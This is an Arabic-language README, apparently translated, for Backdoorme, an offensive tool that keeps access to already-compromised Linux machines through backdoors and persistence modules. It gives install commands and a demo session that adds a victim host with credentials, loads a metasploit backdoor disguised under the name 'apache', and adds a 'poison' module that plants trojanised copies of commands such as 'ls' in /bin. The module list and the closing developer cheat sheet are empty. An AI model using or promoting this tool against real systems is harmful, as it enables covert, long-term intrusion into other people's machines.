
أداة قوية للاختراق الخلفي التلقائي
أدوات مثل metasploit رائعة لاستغلال أجهزة الكمبيوتر، لكن ماذا يحدث بعد أن تحصل على وصول إلى جهاز كمبيوتر؟ يجيب backdoorme على هذا السؤال من خلال إطلاق مجموعة من الأبواب الخلفية لتأسيس استمرارية لفترات طويلة من الزمن.
بمجرد إنشاء اتصال SSH بالهدف، يمكن أن تتحقق نقاط قوة Backdoorme. لسوء الحظ، Backdoorme ليست أداة للحصول على وصول الجذر - فقط للحفاظ على ذلك الوصول بمجرد الحصول عليه.
يرجى استخدام Backdoorme فقط بإذن صريح - من فضلك لا تخترق دون إذن.
ينقسم Backdoorme إلى جزئين: الأبواب الخلفية والوحدات.
الأبواب الخلفية هي أجزاء صغيرة من الكود تستمع على منفذ وتوجه إلى مترجم، مثل bash. هناك العديد من الأبواب الخلفية المكتوبة بلغات مختلفة لإعطاء التنوع.
الوحدات تجعل الأبواب الخلفية أكثر فعالية من خلال تشغيلها بشكل أكثر تكرارًا، على سبيل المثال، كل بضع دقائق أو عند تشغيل الكمبيوتر. هذا يساعد في تأسيس الاستمرارية.
عرض توضيحي:
لبدء backdoorme، تأكد أولاً من أن لديك التبعيات المطلوبة.
بالنسبة لـ Python 3.5+:
$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
بالنسبة لـ Python 2.7:
$ sudo python dependencies.py
تشغيل backdoorme:
$ python master.py
لإضافة هدف:
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>>
لاستخدام باب خلفي، ما عليك سوى تشغيل كلمة "use".
>> use shell/metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>
من هناك، يمكنك تعيين الخيارات ذات الصلة بالباب الخلفي. قم بتشغيل "show options" أو "help" لرؤية قائمة المعلمات التي يمكن تكوينها. لتعيين خيار، ما عليك سوى استخدام كلمة "set".
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name initd name of the backdoor False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name apache name of the backdoor False
...
كما في metasploit، يتم تنظيم الأبواب الخلفية حسب الفئة.
كل باب خلفي لديه القدرة على تطبيق وحدات إضافية عليه لجعل الباب الخلفي أكثر فعالية. لإضافة وحدة، ما عليك سوى استخدام كلمة "add".
(msf) >> add poison
+ Poison module added
كل وحدة تحتوي على معلمات إضافية يمكن تخصيصها، وإذا قمت بإعادة تشغيل "help"، يمكنك رؤية أو تعيين أي خيارات إضافية.
(msf) >> help
...
Poison module options:
Option Value Description Required
------ ----- ----------- --------
name ls name of command to poison False
location /bin where to put poisoned files into False
الوحدات الممكنة حاليًا تشمل:
يدعم Backdoorme أهدافًا متعددة مختلفة في وقت واحد، منظمة حسب الرقم عند إدخالها. يحتفظ النواة بهدف "حالي" واحد، والذي ستتجه إليه أي أبواب خلفية جديدة افتراضيًا. للتبديل بين الأهداف يدويًا، ما عليك سوى إضافة رقم الهدف بعد الأمر: "use metasploit 2" سيقوم بإعداد الباب الخلفي metasploit ضد الهدف الثاني. قم بتشغيل "list" لرؤية قائمة الأهداف الحالية، وما إذا كان الاتصال مفتوحًا أم مغلقًا، وما هي الأبواب الخلفية والوحدات المتاحة.
لا يزال Backdoorme في مراحله المبكرة جدًا! لا تتردد في المساهمة في المشروع - ببساطة قم بعمل fork له، وقم بإجراء تغييراتك، ثم قدم طلب سحب (pull request). لديك فكرة عن باب خلفي رائع، أو شيء يمكننا تحسينه؟ قم بإنشاء issue وسنضيفه في أقرب وقت! يرجى مراسلتنا عبر البريد الإلكتروني [email protected] لأي أسئلة.
إذا كنت ترغب في إضافة باب خلفي خاص بك، اتبع الإرشادات الواردة في ملف backdoorme/backdoors/template.py.
إذا كنت ترغب في إضافة وحدة خاصة بك، اتبع الإرشادات الواردة في ملف backdoorme/modules/template.py.
ورقة غش للمطورين: